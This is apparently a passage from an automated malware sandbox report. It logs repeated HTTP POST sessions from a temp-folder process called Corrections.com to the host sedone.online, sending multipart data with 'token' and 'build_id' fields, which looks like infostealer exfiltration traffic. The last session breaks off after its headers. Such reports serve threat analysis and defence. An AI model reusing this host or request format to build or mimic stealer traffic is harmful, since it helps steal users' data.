                                                                                                                                                                                                                                                                                          2024-12-15 19:48:26 UTC4421OUTData Raw: 2d 2d 2d 2d 2d 2d 30 5a 43 32 44 42 53 30 52 31 4e 59 55 33 57 54 30 48 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 43 32 44 42 53 30 52 31 4e 59 55 33 57 54 30 48 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 43 32 44 42 53 30 52 31 4e 59 55 33 57 54 30 48 4c 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------0ZC2DBS0R1NYU3WT0HLNContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------0ZC2DBS0R1NYU3WT0HLNContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------0ZC2DBS0R1NYU3WT0HLNCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:27 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          26192.168.2.449843116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:28 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----8Q9RQQQQ1DJMYU379R16
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 4421
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:28 UTC4421OUTData Raw: 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------8Q9RQQQQ1DJMYU379R16Cont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:29 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          27192.168.2.449848116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:29 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----47YMOHDTJW4EUAAA1VKF
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 6533
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:29 UTC6533OUTData Raw: 2d 2d 2d 2d 2d 2d 34 37 59 4d 4f 48 44 54 4a 57 34 45 55 41 41 41 31 56 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 34 37 59 4d 4f 48 44 54 4a 57 34 45 55 41 41 41 31 56 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 34 37 59 4d 4f 48 44 54 4a 57 34 45 55 41 41 41 31 56 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------47YMOHDTJW4EUAAA1VKFContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------47YMOHDTJW4EUAAA1VKFContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------47YMOHDTJW4EUAAA1VKFCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:30 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          28192.168.2.449854116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:31 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----8Q9RQQQQ1DJMYU379R16
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 6561
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:31 UTC6561OUTData Raw: 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------8Q9RQQQQ1DJMYU379R16Cont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:32 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          29192.168.2.449856116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:32 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----Q1N7GVSR9H47QQ1V3WLN
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 11445
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:32 UTC11445OUTData Raw: 2d 2d 2d 2d 2d 2d 51 31 4e 37 47 56 53 52 39 48 34 37 51 51 31 56 33 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 37 47 56 53 52 39 48 34 37 51 51 31 56 33 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 37 47 56 53 52 39 48 34 37 51 51 31 56 33 57 4c 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------Q1N7GVSR9H47QQ1V3WLNContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------Q1N7GVSR9H47QQ1V3WLNContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------Q1N7GVSR9H47QQ1V3WLNCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:33 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          30192.168.2.449862116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:34 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----Q1NGDT0R9H4EU37QIMYM
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 14153
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:34 UTC14153OUTData Raw: 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------Q1NGDT0R9H4EU37QIMYMCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:35 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          31192.168.2.449867116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:35 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----RIWTJEUKXLN7QIMYUSJM
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 4277
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:35 UTC4277OUTData Raw: 2d 2d 2d 2d 2d 2d 52 49 57 54 4a 45 55 4b 58 4c 4e 37 51 49 4d 59 55 53 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 52 49 57 54 4a 45 55 4b 58 4c 4e 37 51 49 4d 59 55 53 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 52 49 57 54 4a 45 55 4b 58 4c 4e 37 51 49 4d 59 55 53 4a 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------RIWTJEUKXLN7QIMYUSJMContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------RIWTJEUKXLN7QIMYUSJMContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------RIWTJEUKXLN7QIMYUSJMCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:36 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          32192.168.2.449873116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:37 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----2DTJEUS2DTRQQIMOZMYM
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 6249
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:37 UTC6249OUTData Raw: 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 32 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------2DTJEUS2DTRQQIMOZMYMContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------2DTJEUS2DTRQQIMOZMYMCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:38 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          33192.168.2.449874116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:38 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----A1N7QIE37YCBAAA1VKN7
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 4573
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:38 UTC4573OUTData Raw: 2d 2d 2d 2d 2d 2d 41 31 4e 37 51 49 45 33 37 59 43 42 41 41 41 31 56 4b 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 41 31 4e 37 51 49 45 33 37 59 43 42 41 41 41 31 56 4b 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 41 31 4e 37 51 49 45 33 37 59 43 42 41 41 41 31 56 4b 4e 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------A1N7QIE37YCBAAA1VKN7Content-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------A1N7QIE37YCBAAA1VKN7Content-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------A1N7QIE37YCBAAA1VKN7Cont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:39 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          34192.168.2.449880116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:40 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GVA1VKFU3EKF3E37900Z
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 1977
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
